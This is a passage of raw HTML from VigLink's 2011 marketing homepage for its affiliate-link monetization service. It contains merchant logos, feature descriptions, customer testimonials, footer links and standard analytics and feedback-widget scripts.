src="/public/images/partners_lg/walmart.png" alt="Walmart logo" width="167" height="41"/> <img src="/public/images/partners_lg/target.png" alt="Target logo" width="47" height="59"/> <img src="/public/images/partners_lg/newegg.png" alt="Newegg logo" width="81" height="39"/> <span class="zoom">More Partners</span> </a> <h4>Over 12,500 Merchants</h4> <p> Enjoy coverage of thousands of merchants across more than 20 affiliate networks. Automatically participate in all of them with one simple signup. </p> </div></div><div> <div class="column span-33p"> <h4>Easy to Install</h4> <p> Install VigLink by pasting a few lines of HTML into your site. VigLink also works with common platforms like WordPress, Blogger, TypePad and more. 
</p> </div> <div class="column span-33p"> <h4>Reliable on Any Size Site</h4> <p> VigLink works for any site, whether it gets 5 visits or 5 billion. Our system is designed to be totally failsafe. Even if our servers blew up, your links will keep working perfectly. </p> </div> <div class="column span-33p"> <h4>Already an Affiliate?</h4> <p> VigLink only affiliates links you've missed, or links in programs you're not already using. Links you've already affiliated are left alone. VigLink won't cost you a thing. </p> </div> <div class="column span-100p" id="signup"> <a href="/users/signup" class="default button">Get Started Today</a> </div> <div class="column span-100p" id="quotes"> <ul class="quotes"> <li> <blockquote> VigLink has been a true partner in every aspect of the word. They continue to push the envelope to improve the consumer experience, while delivering high quality traffic to our site. I would recommend VigLink for any blog/forum that puts the consumer first. </blockquote> <p> <a href="http://motors.ebay.com"> <img src="/public/images/quotes/logo-ebaymotors.png" width="164" height"38" alt="Ebay Motors logo"/> <span class="who">Famous Rhodes</span> <span class="title">Director of eBay Motors</span> </a> </p></li><li> <blockquote> VigLink's technology is easy to install and instantly provides detailed reporting of revenue that you weren't making before. Beyond that, the technical team has been highly competent and responsive to needed changes - there's not a lot more we could ask for. We'll look forward to more products from this team in the future. </blockquote> <p> <a href="http://www.huddler.com"> <img src="/public/images/quotes/logo-huddler.png" width="162" height"49" alt="Huddler logo"/> <span class="who">Dan Gill</span> <span class="title">CEO Huddler.com</span> </a> </p></li><li> <blockquote> From the first day we started with VigLink, we have never looked back, or elsewhere, for real time commission link management. 
</blockquote> <p> <a href="http://www.avsforum.com"> <img src="/public/images/quotes/logo-avsforum.png" width="182" height"33" alt="AVS Forums logo"/> <span class="who">David Bott</span> <span class="title">AVSForum.com, Inc.</span> </a> </p></li><li> <blockquote> VigLink has been a great and responsive partner during our nearly 2 year partnership. Their innovative products and service have provided an additional channel of monetization without interfering with our core user experience. The additional value they bring to the table is a willingness to collaborate and assist us in developing new monetization opportunities. </blockquote> <p> <a href="http://www.internetbrands.com/"> <img src="/public/images/quotes/logo-internetbrands.png" width="109" height"49" alt="Internet Brands logo"/> <span class="who">Alvin Fong</span> <span class="title">Director, Internet Brands</span> </a> </p></li><li> <blockquote> VigLink has now become an essential part of our business strategy and a major revenue stream. A truly innovative way to monetize any web site quickly without the addition of traditional intrusive display ads. </blockquote> <p> <a href="http://www.forumfoundry.com/"> <img src="/public/images/quotes/logo-forumfoundry.png" width="80" height"55" alt="Forum Foundry logo"/> <span class="who">Dan Kiehl</span> <span class="title">Forumfoundry.com</span> </a> </p></li><li> <blockquote> VigLink is a fast, automated way for Bloggers to partner with Google Affiliate Network. It takes minimal effort for Bloggers to monetize their content through Google Affiliate Network links and we've already seen VigLink installs result in new productive, affiliate publishers. </blockquote> <p> <a href="http://www.connectcommerce.com/"> <span class="who">Mari Condon</span> <span class="title">Publisher Account Manager,</span> <span class="title">Google Affiliate Network</span> </a> </p></li><li> <blockquote> I was skeptical at first how much VigLink could do for me. 
After almost a year of putting it off I decided to give it a try. Now I'm very sorry I lost a year of significant revenue. Installation takes a minute, nice Control Panel, no noticeable difference for your users, and best of all great money paid on time! </blockquote> <p> <a href="http://www.ferrarichat.com/"> <img src="/public/images/quotes/logo-ferrarichat.png" width="147" height"38" alt="Ferrari Chat logo"/> <span class="who">Rob Lay</span> <span class="title">Owner, Ferrarichat.com</span> </a> </p></li><li> <blockquote> VigLink is a long-standing strategic partner with eBay, eBay Motors, and eBay Marketing. We consider VigLink to be one of the most relevant and efficient sub-affiliate partners we have in our program today. Their work to build unique incremental tools with eBay APIs and to standardize implementations across many different kinds of platforms sets them apart as an innovative industry leader in the internet marketing space. </blockquote> <p> <a href="http://www.schaafco.com/"> <img src="/public/images/quotes/logo-schaaf.png" width="107" height"47" alt="Schaaf Partnercentric logo"/> <span class="title">Schaaf-PartnerCentric/eBay</span> </a> </p></li><li> <blockquote> I was skeptical about the VigLink program when it was presented. I checked with two more technical advisers who said it looked OK. I signed up, put in the code in my Forum software and was shocked to see the income the first month. I've been receiving three and sometimes four figures of income each month. It's a great deal. </blockquote> <p> <a href="http://www.askandyaboutclothes.com/"> <span class="who">Andy Gilchrist</span> <span class="title">Owner, AskAndyAboutClothes.com</span> </a> </p></li><li> <blockquote> I have been with VigLink one week and so far, I love it! I don't have time to affiliate all my links when I don't know which blog posts will generate traffic and which ones don't. VigLink gives me the option to focus on good content, and traffic building, not link building. 
</blockquote> <p> <a href="http://www.morewithlesstoday.com/"> <span class="who">Lori Felix</span> <span class="title">Blogger, More With Less Today</span> </a> </p></li></ul> </div></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>